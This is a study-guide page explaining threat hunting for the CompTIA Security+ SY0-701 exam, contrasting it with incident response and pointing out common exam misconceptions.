Threat hunting — SY0-701
Threat hunting defined for CompTIA Security+ SY0-701: what it is, how it differs from incident response, and the exam misconceptions candidates need to avoid.
WHAT IT IS
Threat hunting is the proactive, analyst-driven search for evidence of adversary activity that has not yet been detected by automated tools. Rather than waiting for an alert to trigger an investigation, a threat hunter formulates a hypothesis about how a threat actor — defined by NIST SP 800-150 as "an individual or a group posing a threat" — might be operating inside an environment, then searches for technical artifacts or observables consistent with that hypothesis.
Those artifacts, once surfaced, are what NIST SP 800-61r3 calls indicators of compromise (IOCs): "technical artifacts or observables that suggest that an attack is imminent or is currently underway or that a compromise may have already occurred." Threat hunting seeks IOCs before an automated system raises an alarm about them.
Mental model
Think of threat hunting as asking a question before you have evidence of a problem: "If a threat actor were using a technique documented in MITRE ATT&CK — a knowledge base of adversary tactics and techniques based on real-world observations — what would their activity look like in my logs, and is it already there?"
The hunt begins with a hypothesis grounded in threat intelligence — "threat information that has been aggregated, transformed, analyzed, interpreted, or enriched to provide the necessary context for decision-making processes" (NIST SP 800-150) — then proceeds to collection, analysis, and either confirmation or refutation of that hypothesis. A successful hunt that confirms adversary activity hands off to incident response; one that finds nothing still improves detection coverage.
When to use it
The exam frequently tests whether a candidate can distinguish threat hunting from incident response. The key boundary: threat hunting is initiated by the analyst; incident response is initiated by an event.
| Dimension | Threat Hunting | Incident Response |
|---|---|---|
| Trigger | Analyst hypothesis, not an alert | A detected event or confirmed incident |
| Goal | Find unknown or undetected activity | Mitigate violations of security policies (NIST SP 800-61r3) |
| Starting point | Threat intelligence, known adversary TTPs | An alert, user report, or automated detection |
| Outcome | Improved detection; possible handoff to IR | Containment, eradication, recovery |
| State of the threat | Assumed present but not yet confirmed | Known or suspected to have occurred |
MITRE ATT&CK supports hunting by providing a common language to structure, compare, and analyze threat intelligence, and by enabling analysts to develop analytics that detect the techniques used by an adversary.
COMMON MISCONCEPTION
The exam-relevant trap is conflating threat hunting with incident response or with routine security monitoring. Threat hunting is not the same as reviewing SIEM alerts — monitoring waits for a signal, hunting actively searches in the absence of one. It is also not the same as incident response: incident response is reactive ("we have a confirmed event; now mitigate it"), whereas threat hunting is initiated before a formal incident is declared.
A related misconception is that threat hunting produces confirmed incidents. More often it refutes a hypothesis, and the value lies in the improved detection logic or visibility gaps uncovered during the process — not exclusively in catching a live attacker.
How it shows up on the exam
The cognitive target is distinguishing between proactive and reactive security operations. Candidates are often tested on scenarios where an organization "suspects" adversary activity with no alert — the correct framing is threat hunting, not incident response, and not vulnerability scanning. Signal phrases that point toward threat hunting include: "no alert was triggered," "the analyst suspected," "proactively searched," "hypothesis-driven," or references to using adversary TTPs or threat intelligence as a starting point rather than a confirmed detection.
Candidates sometimes confuse threat hunting with threat intelligence itself. Threat intelligence is the enriched information used to form a hunting hypothesis; the hunt is the active search process that operationalizes that intelligence.
Related concepts
Sources
Every claim on this page traces to the public exam blueprint and official documentation: